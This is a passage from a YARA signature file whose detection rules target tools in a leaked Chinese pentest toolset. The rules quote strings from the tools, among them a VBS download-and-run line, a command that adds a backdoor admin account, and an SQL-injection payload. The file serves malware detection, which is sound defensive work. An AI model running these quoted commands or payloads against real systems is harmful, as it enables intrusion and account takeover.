0x5a4d and filesize < 50KB and all of them } rule CN_Honker_struts2_catbox { meta: description = "Sample from CN Honker Pentest Toolset - file catbox.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304" id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9" strings: $s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii $s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 8160KB and all of them } rule CN_Honker_getlsasrvaddr { meta: description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" modified = "2022-12-21" score = 70 hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce" id = "fa0c0376-c5c3-5b48-b03e-86cefb547479" strings: $s8 = "pingme.txt" fullword ascii /* PEStudio Blacklist: strings */ $s16 = ".\\lsasrv.pdb" ascii $s20 = "Addresses Found: " fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } rule CN_Honker_ms10048_x64 { meta: description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0" id = "b65b0bad-d74c-5e7a-a613-69ef80585c23" strings: $s1 = "[ ] Creating evil window" fullword ascii $s2 = "[+] Set to %d exploit half succeeded" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 125KB and all of them } rule CN_Honker_LogCleaner { meta: description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e" id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7" strings: $s3 = ".exe [(path]" fullword ascii $s4 = "LogCleaner v" ascii condition: uint16(0) == 0x5a4d and filesize < 250KB and all of them } rule CN_Honker_shell_brute_tool { meta: description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "f6903a15453698c35dce841e4d09c542f9480f01" id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1" strings: $s0 = "http://24hack.com/xyadmin.asp" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */ condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule CN_Honker_hxdef100 { meta: description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6" id = "3b931752-85ae-52d0-9deb-1a1b03b39e32" strings: $s6 = "BACKDOORSHELL" fullword ascii /* PEStudio Blacklist: strings */ $s15 = "%tmpdir%" fullword ascii $s16 = "%cmddir%" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule CN_Honker_Arp_EMP_v1_0 { meta: description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee" id = "03782e94-4fac-529f-b235-19cdb124d53b" strings: $s0 = "Arp EMP v1.0.exe" fullword wide condition: uint16(0) == 0x5a4d and filesize < 400KB and all of them } rule CN_Honker_GetWebShell { meta: description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "b63b53259260a7a316932c0a4b643862f65ee9f8" id = "919883f4-af66-5d07-ad41-8cba3e049396" strings: $s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */ $s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */ $s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */ $s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 70KB and 1 of them } rule CN_Honker_Cracker_SHELL { meta: description = "Sample from CN Honker Pentest Toolset - file SHELL.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "c1dc349ff44a45712937a8a9518170da8d4ee656" id = "2249a058-7469-5054-9c51-cb20ef8197ca" strings: $s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */ $s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */ $s4 = "WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule CN_Honker_MSTSC_can_direct_copy { meta: description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" modified = "2022-12-21" score = 70 hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae" id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e" strings: $s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii $s2 = "Clear Password" fullword wide /* PEStudio Blacklist: strings */ $s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 600KB and all of them } rule CN_Honker_lcx_lcx { meta: description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38" id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df" strings: $s1 = "%s -